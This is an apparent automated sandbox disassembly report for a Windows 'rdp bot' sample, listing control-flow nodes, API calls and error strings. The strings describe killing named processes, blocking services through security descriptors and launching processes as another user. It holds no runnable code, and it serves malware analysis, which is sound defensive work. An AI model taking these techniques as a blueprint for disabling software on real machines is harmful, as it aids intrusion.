10648->10649 10650->10648 10650->10649 9413 7ff77572de28 9414 7ff77572de3e 9413->9414 9421 7ff77572d126 9414->9421 9416 7ff77572e2e0 9417 7ff77572e301 9416->9417 9418 7ff77572ccd9 2 API calls 9416->9418 9418->9417 9419 7ff77572db86 9419->9416 9420 7ff77572ccd9 
fputwc fwprintf 9419->9420 9420->9419 9422 7ff77572d137 9421->9422 9432 7ff77572d00f 9422->9432 9425 7ff77572d179 9436 7ff77572cc00 9425->9436 9426 7ff77572d186 9440 7ff77572cdd0 9426->9440 9429 7ff77572ca90 fputwc 9431 7ff77572d191 9429->9431 9430 7ff77572d184 9430->9419 9431->9429 9431->9430 9433 7ff77572d02d 9432->9433 9460 7ff77572e4e0 9433->9460 9437 7ff77572cc16 9436->9437 9437->9437 9592 7ff77572cacd 9437->9592 9444 7ff77572cdec 9440->9444 9441 7ff77572ce3d 9442 7ff77572ceda 9441->9442 9443 7ff77572ca90 fputwc 9441->9443 9446 7ff77572cee0 9442->9446 9450 7ff77572ca90 fputwc 9442->9450 9443->9442 9444->9441 9445 7ff77572ca90 fputwc 9444->9445 9445->9444 9447 7ff77572cee9 9446->9447 9454 7ff77572cf16 9446->9454 9449 7ff77572ca90 fputwc 9447->9449 9448 7ff77572ca90 fputwc 9448->9454 9451 7ff77572cf6b 9449->9451 9450->9442 9458 7ff77572cf7f 9451->9458 9613 7ff77572cc72 9451->9613 9453 7ff77572cf97 9455 7ff77572cfbf 9453->9455 9459 7ff77572ca90 fputwc 9453->9459 9454->9448 9454->9451 9457 7ff77572ccd9 2 API calls 9454->9457 9455->9431 9456 7ff77572ca90 fputwc 9456->9458 9457->9454 9458->9453 9458->9456 9459->9453 9461 7ff77572e556 9460->9461 9462 7ff77572e6b4 9461->9462 9479 7ff77572d120 9461->9479 9524 7ff77572f663 9461->9524 9535 7ff77572e34c 9462->9535 9465 7ff77572e5ee 9466 7ff77572e6ac 9465->9466 9468 7ff77572e6e0 9465->9468 9531 7ff77572f717 9466->9531 9538 7ff77572e320 9468->9538 9470 7ff77572ee37 9472 7ff77572f803 6 API calls 9470->9472 9474 7ff77572ee44 9472->9474 9473 7ff77572ed9f 9473->9470 9494 7ff77572ee18 9473->9494 9545 7ff77572f949 9473->9545 9481 7ff77572f949 6 API calls 9474->9481 9490 7ff77572ee5c 9474->9490 9475 7ff77572f717 4 API calls 9475->9479 9477 7ff77572f949 6 API calls 9477->9470 9478 7ff77572f717 4 API calls 9487 7ff77572f3c7 9478->9487 9479->9425 9479->9426 9481->9490 9483 7ff77572eaae 9483->9475 9485 7ff77572f3de 9488 7ff77572f717 4 API calls 9485->9488 9487->9483 9487->9485 9492 7ff77572f717 4 API calls 9487->9492 9488->9483 9489 
7ff77572eee9 9495 7ff77572fa57 6 API calls 9489->9495 9500 7ff77572ef05 9489->9500 9490->9489 9564 7ff77572fa57 9490->9564 9491 7ff77572f717 4 API calls 9491->9494 9492->9485 9494->9470 9494->9477 9495->9500 9496 7ff77572ef22 9497 7ff77572efdb 9496->9497 9498 7ff77572ef6e 9496->9498 9499 7ff77572efe6 9497->9499 9506 7ff77572f2cd 9497->9506 9504 7ff77572f763 6 API calls 9498->9504 9520 7ff77572ebc1 9498->9520 9501 7ff77572eff7 9499->9501 9505 7ff77572fa57 6 API calls 9499->9505 9500->9496 9570 7ff77572f763 9500->9570 9507 7ff77572f663 6 API calls 9501->9507 9519 7ff77572f030 9501->9519 9504->9520 9505->9501 9509 7ff77572f321 9506->9509 9511 7ff77572f763 6 API calls 9506->9511 9510 7ff77572f00e 9507->9510 9508 7ff77572f763 6 API calls 9508->9496 9513 7ff77572fa57 6 API calls 9509->9513 9509->9520 9512 7ff77572fa57 6 API calls 9510->9512 9511->9506 9512->9519 9513->9520 9515 7ff77572f717 4 API calls 9515->9519 9516 7ff77572f119 9517 7ff77572f1b4 9516->9517 9523 7ff77572f134 9516->9523 9518 7ff77572fa57 6 API calls 9517->9518 9517->9520 9518->9520 9519->9509 9519->9515 9519->9516 9519->9520 9522 7ff77572f763 6 API calls 9519->9522 9576 7ff77572fb9a 9519->9576 9520->9478 9520->9483 9521 7ff77572f763 6 API calls 9521->9523 9522->9519 9523->9520 9523->9521 9583 7ff77572f560 9524->9583 9527 7ff77572f68b 9589 7ff77572f605 9527->9589 9528 7ff77572f6ec malloc 9528->9527 9530 7ff77572f706 9528->9530 9530->9465 9532 7ff77572f73b 9531->9532 9533 7ff77572f724 9531->9533 9532->9462 9534 7ff77572f560 4 API calls 9533->9534 9534->9532 9536 7ff77572e320 6 API calls 9535->9536 9537 7ff77572e360 9536->9537 9537->9479 9539 7ff77572e32c 9538->9539 9540 7ff77572f663 6 API calls 9539->9540 9541 7ff77572e340 9540->9541 9541->9473 9541->9483 9541->9520 9542 7ff77572f803 9541->9542 9543 7ff77572f663 6 API calls 9542->9543 9544 7ff77572f814 9543->9544 9544->9473 9546 7ff77572f95d 9545->9546 9547 7ff77572f973 9545->9547 9549 7ff77572f763 6 API calls 9546->9549 9548 7ff77572edfd 9547->9548 9550 
7ff77572f560 4 API calls 9547->9550 9557 7ff77572f9d6 9547->9557 9560 7ff77572f829 9548->9560 9549->9547 9551 7ff77572f99e 9550->9551 9552 7ff77572f9b4 9551->9552 9553 7ff77572f803 6 API calls 9551->9553 9552->9548 9555 7ff77572f605 LeaveCriticalSection 9552->9555 9553->9552 9554 7ff77572f560 4 API calls 9554->9557 9555->9557 9556 7ff77572f717 4 API calls 9556->9557 9557->9548 9557->9554 9557->9556 9558 7ff77572f829 6 API calls 9557->9558 9559 7ff77572f605 LeaveCriticalSection 9557->9559 9558->9557 9559->9557 9561 7ff77572f847 9560->9561 9562 7ff77572f663 6 API calls 9561->9562 9563 7ff77572ee0b 9562->9563 9563->9491 9565 7ff77572fa80 9564->9565 9566 7ff77572f663 6 API calls 9565->9566 9568 7ff77572fa90 9566->9568 9567 7ff77572fb42 9567->9489 9568->9567 9568->9568 9569 7ff77572f717 4 API calls 9568->9569 9569->9567 9572 7ff77572f77e 9570->9572 9571 7ff77572ef43 9571->9496 9571->9508 9572->9571 9573 7ff77572f663 6 API calls 9572->9573 9574 7ff77572f7b5 9573->9574 9574->9571 9575 7ff77572f717 4 API calls 9574->9575 9575->9571 9577 7ff77572fbaf 9576->9577 9578 7ff77572fbd0 9577->9578 9579 7ff77572fbb3 9577->9579 9581 7ff77572f663 6 API calls 9578->9581 9580 7ff77572f663 6 API calls 9579->9580 9582 7ff77572fbba 9580->9582 9581->9582 9582->9519 9584 7ff77572f573 EnterCriticalSection 9583->9584 9587 7ff77572f591 9583->9587 9584->9587 9585 7ff77572f5a4 InitializeCriticalSection InitializeCriticalSection 9585->9587 9586 7ff77572f5ec Sleep 9586->9587 9587->9584 9587->9585 9587->9586 9588 7ff77572f5fe 9587->9588 9588->9527 9588->9528 9590 7ff77572f60e LeaveCriticalSection 9589->9590 9591 7ff77572f625 9589->9591 9590->9591 9591->9530 9593 7ff77572cae7 9592->9593 9594 7ff77572cafc 9593->9594 9596 7ff77572cb4c 9593->9596 9595 7ff77572cb27 fwprintf 9594->9595 9597 7ff77572cb04 fwprintf 9594->9597 9599 7ff77572cb39 9595->9599 9602 7ff77572ca90 fputwc 9596->9602 9605 7ff77572cb51 9596->9605 9597->9599 9599->9430 9600 7ff77572cbd9 9600->9599 9604 7ff77572ca90 fputwc 9600->9604 9601 
7ff77572cb8f strlen 9607 7ff77573026c 9601->9607 9602->9596 9604->9600 9605->9600 9605->9601 9606 7ff77572ca90 fputwc 9605->9606 9606->9605 9608 7ff77573027d 9607->9608 9609 7ff775730282 ___mb_cur_max_func ___lc_codepage_func 9607->9609 9608->9609 9610 7ff7757302bb 9609->9610 9611 7ff775730150 4 API calls 9610->9611 9612 7ff7757302cf 9611->9612 9612->9605 9614 7ff77572cc80 localeconv 9613->9614 9616 7ff77572ccae 9613->9616 9615 7ff77573026c 6 API calls 9614->9615 9615->9616 10136 7ff77572292e 10137 7ff775722944 10136->10137 10138 7ff77572299e 10137->10138 10139 7ff775722a53 10137->10139 10140 7ff775722a87 10138->10140 10141 7ff7757229a7 10138->10141 10142 7ff7757214e2 6 API calls 10139->10142 10143 7ff7757214e2 6 API calls 10140->10143 10144 7ff775722abb 10141->10144 10145 7ff7757229bd strlen 10141->10145 10154 7ff7757229d5 10142->10154 10143->10154 10146 7ff7757214e2 6 API calls 10144->10146 10147 7ff775722aef strcat 10145->10147 10145->10154 10146->10154 10148 7ff775722b08 strlen strlen 10147->10148 10156 7ff775722bec 10147->10156 10149 7ff775722b38 strlen strcat 10148->10149 10148->10154 10150 7ff775722b74 10149->10150 10152 7ff775722b95 strlen strlen 10150->10152 10150->10156 10151 7ff775722c1a 10153 7ff775722c32 LogonUserA 10151->10153 10172 7ff775722ce5 10151->10172 10155 7ff775722bbc strlen strcat 10152->10155 10152->10156 10158 7ff775722d9d CreateProcessAsUserA 10153->10158 10159 7ff775722c63 GetLastError 10153->10159 10160 7ff775722a3c 10154->10160 10161 7ff7757214e2 6 API calls 10154->10161 10155->10150 10156->10151 10156->10154 10169 7ff775723032 10156->10169 10157 7ff775723041 CreateProcessA 10162 7ff775723098 GetLastError 10157->10162 10163 7ff775723191 10157->10163 10166 7ff775722dfc GetLastError 10158->10166 10167 7ff775722eed 10158->10167 10165 7ff7757214e2 6 API calls 10159->10165 10161->10160 10168 7ff7757214e2 6 API calls 10162->10168 10164 7ff7757214e2 6 API calls 10163->10164 10164->10160 10165->10151 10170 7ff7757214e2 6 API calls 10166->10170 
10171 7ff7757214e2 6 API calls 10167->10171 10167->10172 10168->10169 10169->10154 10169->10157 10170->10172 10171->10172 10173 7ff775722f27 CloseHandle 10172->10173 10174 7ff775722f2d 10172->10174 10173->10174 10174->10154 10175 7ff775722f36 10174->10175 10175->10160 10176 7ff7757214e2 6 API calls 10175->10176 10176->10160 9617 7ff77572c631 9619 7ff77572c64d 9617->9619 9618 7ff77572c6c3 9626 7ff77572b5da 9618->9626 9619->9618 9621 7ff77572c6c8 9619->9621 9630 7ff77572bdaf 9621->9630 9623 7ff77572ca67 9624 7ff77572b3e7 fputc 9625 7ff77572c382 9624->9625 9625->9623 9625->9624 9627 7ff77572b5f0 9626->9627 9650 7ff77572b4fe 9627->9650 9635 7ff77572bdc6 9630->9635 9631 7ff77572bf9d 9634 7ff77572b3e7 fputc 9631->9634 9632 7ff77572bf5e 9632->9631 9633 7ff77572b3e7 fputc 9632->9633 9633->9631 9636 7ff77572bfaa 9634->9636 9635->9632 9638 7ff77572b3e7 fputc 9635->9638 9637 7ff77572b3e7 fputc 9636->9637 9639 7ff77572bfbb 9637->9639 9638->9635 9641 7ff77572b3e7 fputc 9639->9641 9642 7ff77572bfc1 9639->9642 9640 7ff77572c008 9643 7ff77572c054 9640->9643 9645 7ff77572b3e7 fputc 9640->9645 9641->9639 9642->9640 9647 7ff77572b3e7 fputc 9642->9647 9662 7ff77572b64c 9642->9662 9676 7ff77572b420 9642->9676 9646 7ff77572b3e7 fputc 9643->9646 9645->9640 9648 7ff77572c068 9646->9648 9647->9642 9651 7ff77572b516 9650->9651 9652 7ff77572b523 9651->9652 9658 7ff77572b3e7 9651->9658 9654 7ff77572b3e7 fputc 9652->9654 9656 7ff77572b56e 9652->9656 9654->9652 9655 7ff77572b58a 9655->9625 9656->9655 9657 7ff77572b3e7 fputc 9656->9657 9657->9656 9659 7ff77572b3f8 9658->9659 9660 7ff77572b410 9659->9660 9661 7ff77572b409 fputc 9659->9661 9660->9651 9661->9660 9663 7ff77572b68f 9662->9663 9664 7ff77572b666 9662->9664 9665 7ff77572b6a7 9663->9665 9666 7ff77572b706 9663->9666 9668 7ff77573026c 6 API calls 9664->9668 9686 7ff775730047 9665->9686 9667 7ff77572b3e7 fputc 9666->9667 9674 7ff77572b6f2 9667->9674 9668->9663 9671 7ff77572b6f4 9673 7ff77572b3e7 fputc 9671->9673 9672 7ff77572b6dc 9672->9674 
9675 7ff77572b3e7 fputc 9672->9675 9673->9674 9674->9642 9675->9672 9677 7ff775730047 4 API calls 9676->9677 9678 7ff77572b44f 9677->9678 9679 7ff77572b3e7 fputc 9678->9679 9684 7ff77572b462 9678->9684 9679->9678 9680 7ff77572b4d1 9682 7ff77572b4ed 9680->9682 9683 7ff77572b3e7 fputc 9680->9683 9681 7ff775730047 4 API calls 9681->9684 9682->9642 9683->9680 9684->9680 9684->9681 9685 7ff77572b3e7 fputc 9684->9685 9685->9684 9687 7ff775730058 ___mb_cur_max_func ___lc_codepage_func 9686->9687 9688 7ff775730053 9686->9688 9691 7ff77572ffd0 9687->9691 9688->9687 9692 7ff77572fff4 WideCharToMultiByte 9691->9692 9693 7ff77572ffe4 9691->9693 9692->9693 9695 7ff775730034 _errno 9692->9695 9694 7ff77572b6d5 9693->9694 9693->9695 9694->9671 9694->9672 9695->9694 10177 7ff77572212f 10178 7ff775722159 CreateToolhelp32Snapshot 10177->10178 10179 7ff7757221b6 10177->10179 10180 7ff775722227 GetLastError 10178->10180 10181 7ff775722175 Process32First 10178->10181 10182 7ff7757214e2 6 API calls 10179->10182 10183 7ff7757214e2 6 API calls 10180->10183 10184 7ff7757222ff GetLastError 10181->10184 10206 7ff7757221a6 10181->10206 10193 7ff7757221df 10182->10193 10183->10193 10185 7ff77572230c 10184->10185 10189 7ff7757214e2 6 API calls 10185->10189 10186 7ff7757221f4 10190 7ff7757214e2 6 API calls 10186->10190 10187 7ff7757228a3 10199 7ff7757214e2 6 API calls 10187->10199 10188 7ff775722888 CloseHandle 10188->10187 10188->10193 10189->10206 10192 7ff775722211 10190->10192 10193->10186 10193->10187 10194 7ff7757224d3 OpenProcess 10197 7ff7757224f4 TerminateProcess 10194->10197 10198 7ff7757225a3 GetLastError 10194->10198 10195 7ff7757224c2 strcmp 10195->10194 10195->10206 10196 7ff7757226ed Process32Next 10200 7ff775722704 GetLastError 10196->10200 10196->10206 10201 7ff77572250a GetLastError 10197->10201 10202 7ff775722484 CloseHandle 10197->10202 10203 7ff7757214e2 6 API calls 10198->10203 10199->10192 10200->10206 10204 7ff7757214e2 6 API calls 10201->10204 10202->10206 10203->10206 

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                                                  • API String ID: 2897271634-4120527733
                                                                                                                                                  • Opcode ID: b829813eb9698e215a266fa2b4b31c54f972829afe64dadd3eff5c7fe421969e
                                                                                                                                                  • Instruction ID: ae83998c3ee9f3d12cf1f1b5ca8d97b179e6e10b37e908fb80a225cc936fe5b2
                                                                                                                                                  • Opcode Fuzzy Hash: b829813eb9698e215a266fa2b4b31c54f972829afe64dadd3eff5c7fe421969e
                                                                                                                                                  • Instruction Fuzzy Hash: 85D17133E3868B91EA20BB15E8417B8A762FF48F95FD54132D90D576A0DE3CE945C3A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                                                                                                                                  • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                                                                                                                                  • API String ID: 1025937399-1899507746
                                                                                                                                                  • Opcode ID: 5eefb5ce101ca54b87197a8626b6cf7e368369295640dbdbd5fb03039e3b8b91
                                                                                                                                                  • Instruction ID: ea5bfe481cbd065c77effcd393fe9f8465b609da7a0c8346b5943acce2f8a24a
                                                                                                                                                  • Opcode Fuzzy Hash: 5eefb5ce101ca54b87197a8626b6cf7e368369295640dbdbd5fb03039e3b8b91
                                                                                                                                                  • Instruction Fuzzy Hash: 41F12823E3C74386FA706B54A49037C9271EF4CF54FD44032C60E8A6D6CE6EA8C596E6

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3714283218-0
                                                                                                                                                  • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                                                  • Instruction ID: 51bac5fc08003d1bf1eb59fdfa402b9ff256afa139961c89ad002235c703311e
                                                                                                                                                  • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                                                  • Instruction Fuzzy Hash: CF511827A38A8685EB51FB16E851679A3A0FF4CFA4F958035DD0D47391EE3CE84087E1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                      • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                                                                                                                                  • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                                                                                                                                  • API String ID: 3039259412-1782951725
                                                                                                                                                  • Opcode ID: 01bd502358aa155a117c52bb5c5ca10456543c715832b3d2c21d1eaa9214cc1f
                                                                                                                                                  • Instruction ID: 9cbe41ea9b17d8d6c00c4b9c039df24f5fdc3b5044f1503d11110eb2e780690f
                                                                                                                                                  • Opcode Fuzzy Hash: 01bd502358aa155a117c52bb5c5ca10456543c715832b3d2c21d1eaa9214cc1f
                                                                                                                                                  • Instruction Fuzzy Hash: BCD14D22A3C78381FB60AB01E4803A9B760FF8DB54FD44035DA8D46795DE7DE985C7A1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                      • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fopenfwrite
                                                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                                                  • API String ID: 1336347884-544371937
                                                                                                                                                  • Opcode ID: 63a72207a667d57a4e2fcc2606be0a732238c3333479fe985393a82e7d73d70b
                                                                                                                                                  • Instruction ID: 3474048d5330b73c05cc3a940ca332f58c8481c2411dcb5e2d41d35b74ab8445
                                                                                                                                                  • Opcode Fuzzy Hash: 63a72207a667d57a4e2fcc2606be0a732238c3333479fe985393a82e7d73d70b
                                                                                                                                                  • Instruction Fuzzy Hash: 2F518163E3868786FA20BB55D9412B8A362FF48FA5FD84136D90D47291DE3CE546C3A0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                      • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                                                                                                                                  • API String ID: 3395718042-2291025694
                                                                                                                                                  • Opcode ID: 0c6137ecaf56a976e39702cb80bce37edb64c5d5fd7c245d775e8e5e4a3d302b
                                                                                                                                                  • Instruction ID: 4fff6320c060c7f47d1108a912c854acee30e1a3222eac5e1b882a152c7c3d9d
                                                                                                                                                  • Opcode Fuzzy Hash: 0c6137ecaf56a976e39702cb80bce37edb64c5d5fd7c245d775e8e5e4a3d302b
                                                                                                                                                  • Instruction Fuzzy Hash: 20512C63E3C78785F620BB51A8813B89265FF5CF64FD04132C90E067A2DE6DA945C3E1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                      • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                                                                                                                                  • API String ID: 2747014929-530486279
                                                                                                                                                  • Opcode ID: db00cb17437c5ff3fe8cc15a43f8113af3fe9d2b3f4d37739a65c9d18e836ee3
                                                                                                                                                  • Instruction ID: fdac930f0b7a5e0a5b362580745428306d241802855e7c14cf932fe850ca2612
                                                                                                                                                  • Opcode Fuzzy Hash: db00cb17437c5ff3fe8cc15a43f8113af3fe9d2b3f4d37739a65c9d18e836ee3
                                                                                                                                                  • Instruction Fuzzy Hash: AD816452D3C38B81FA347B44A844778B260DF08F64FD49133D96D0B6D1EE6DA98593E2

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                      • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                      • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                                                                                                                  • API String ID: 1423203057-2746879330
                                                                                                                                                  • Opcode ID: c4a5d119b8e46db3d6d484353cd613a654445c2d338f2979c9958e34502116e4
